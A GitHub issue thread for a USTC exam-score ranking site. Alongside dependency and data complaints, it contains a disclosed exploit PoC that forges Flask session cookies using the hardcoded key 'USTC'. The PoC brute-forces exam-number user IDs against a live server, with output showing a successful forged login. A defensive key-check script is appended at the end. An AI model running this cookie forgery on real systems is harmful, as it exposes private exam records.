csflyer / ustcrank
USTC (University of Science and Technology of China) graduate entrance exam score and ranking lookup
Operating system: centos8
Python version: 3.10.3
pip version: 23.0.1
Error message:
ERROR: Cannot install -r pip.txt (line 31) and urllib3==1.26.5 because these package versions have conflicting dependencies.
The conflict is caused by:
The user requested urllib3==1.26.5
requests 2.23.0 depends on urllib3!=1.25.0, !=1.25.1, <1.26 and >=1.21.1
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip attempt to solve the dependency conflict
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts
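However, installing on Windows did not produce the dependency problem.
When deploying, I removed the version requirements from requirements. I don't know whether this is a problem with my environment or whether the dependencies really do conflict.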
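There should be a ranking that leaves out politics and English; that would be more intuitive.
Is it only the data of people who have looked up their scores that takes part in the ranking? So this ranking would actually be skewed high?
It's on the first page
It's on the second page
There are also a few pairs of duplicate records, which I found with Excel...
成绩表.xls
I don't know Python well; maybe just check for records with duplicate exam numbers and delete them.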
# Forms: CSRF protection
app.config['SECRET_KEY'] = 'USTC'
I don't know what you are protecting against.
See the official documentation
# Set the secret key to some random bytes. Keep this really secret!
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
Exploit PoC:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/2/27 11:57
# @Author : Dawnnnnnn
# @Contact: [email protected]
import requests
import zlib
from itsdangerous import base64_decode
import ast
from flask.sessions import SecureCookieSessionInterface

secret_key = 'USTC'


class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key


def session_cookie_encoder(secret_key, session_cookie_structure):
    """ Encode a Flask session cookie """
    try:
        app = MockApp(secret_key)
        session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
        si = SecureCookieSessionInterface()
        s = si.get_signing_serializer(app)
        return s.dumps(session_cookie_structure)
    except Exception as e:
        return "[Encoding error]{}".format(e)


def session_cookie_decoder(session_cookie_value, secret_key=None):
    """ Decode a Flask cookie """
    try:
        if secret_key is None:
            # No key: read the payload without verifying the signature
            compressed = False
            payload = session_cookie_value
            if payload.startswith('.'):
                compressed = True
                payload = payload[1:]
            data = payload.split(".")[0]
            data = base64_decode(data)
            if compressed:
                data = zlib.decompress(data)
            return data
        else:
            app = MockApp(secret_key)
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)
            return s.loads(session_cookie_value)
    except Exception as e:
        return "[Decoding error]{}".format(e)


for i in range(103581210008000, 103581210015886):
    data = {'_user_id': str(i)}
    print(i)
    brute_session = (session_cookie_encoder(secret_key, f"{data}"))
    headers = {
        "Cookie": f'session={brute_session}'
    }
    res = requests.get('http://8.129.43.182/score', headers=headers, allow_redirects=False)
    if res.status_code == 200:
        print(brute_session)
        print(res.text)
        break
    else:
        print(session_cookie_decoder(res.cookies.get('session'), secret_key))
Result:
103581210008105
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008105'}
103581210008106
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008106'}
103581210008107
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008107'}
103581210008108
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008108'}
103581210008109
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008109'}
103581210008110
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008110'}
103581210008111
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008111'}
103581210008112
eyJfdXNlcl9pZCI6IjEwMzU4MTIxMDAwODExMiJ9.YDpJPw.NpdKnMUxImNGxkKF8WkgePUMukY
<!DOCTYPE html>
<html>
<head>
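A defensive counterpart to the issue above, as an added example that is not code from the ustcrank project or from the issue's author: a startup check that refuses a short or guessable Flask secret key, and an offline signature check showing that a cookie signed under the old key stops validating once the key is replaced. The environment variable name `APP_SECRET_KEY` and the two thresholds are assumptions of this example; the signature check follows Flask's default session signer (HMAC-SHA1, salt `cookie-session`).

```python
import base64
import hashlib
import hmac
import secrets

MIN_KEY_BYTES = 32        # assumed policy for this example, not a Flask rule
MIN_DISTINCT_BYTES = 10   # assumed heuristic: flags short words and repeats
SESSION_SALT = b"cookie-session"  # salt used by Flask's default session signer


def key_problems(key):
    """Return the reasons `key` is unfit to sign session cookies (empty = ok)."""
    raw = key.encode() if isinstance(key, str) else bytes(key or b"")
    problems = []
    if len(raw) < MIN_KEY_BYTES:
        problems.append(f"{len(raw)} bytes, need at least {MIN_KEY_BYTES}")
    if len(set(raw)) < MIN_DISTINCT_BYTES:
        problems.append(f"only {len(set(raw))} distinct byte values")
    return problems


def load_secret_key(environ, name="APP_SECRET_KEY"):
    """Read the key from the environment (hypothetical variable name) and
    refuse to start with a missing or guessable value."""
    key = environ.get(name, "")
    problems = key_problems(key)
    if problems:
        raise RuntimeError(f"refusing to start, weak {name}: " + "; ".join(problems))
    return key


def signature_valid(cookie, key):
    """Check a session cookie's signature against `key`: the signing key is
    HMAC-SHA1(key, salt), the signature covers everything before the last dot."""
    signed_part, _, sig = cookie.rpartition(".")
    raw = key.encode() if isinstance(key, str) else key
    derived = hmac.new(raw, SESSION_SALT, hashlib.sha1).digest()
    expected = hmac.new(derived, signed_part.encode(), hashlib.sha1).digest()
    expected_b64 = base64.urlsafe_b64encode(expected).rstrip(b"=").decode()
    return hmac.compare_digest(expected_b64, sig)


if __name__ == "__main__":
    print(key_problems("USTC"))                 # the key quoted in the issue
    strong = secrets.token_hex(32)              # 256 bits from the OS CSPRNG
    print(load_secret_key({"APP_SECRET_KEY": strong}) == strong)
    # Cookie copied from the PoC output above; checked against the new key.
    old = "eyJfdXNlcl9pZCI6IjEwMzU4MTIxMDAwODExMiJ9.YDpJPw.NpdKnMUxImNGxkKF8WkgePUMukY"
    print(signature_valid(old, strong))
```

Replacing the key invalidates every session signed under the old one, so all users have to log in again after the change.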